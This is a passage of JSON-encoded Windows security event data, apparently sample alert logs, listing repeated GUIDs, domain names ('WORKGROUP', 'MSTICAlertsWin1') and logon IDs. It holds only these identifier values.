-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\"],\"SubjectDomainName\":[\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\"],\"SubjectLogonId\":[\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfaac27\",\"0xfa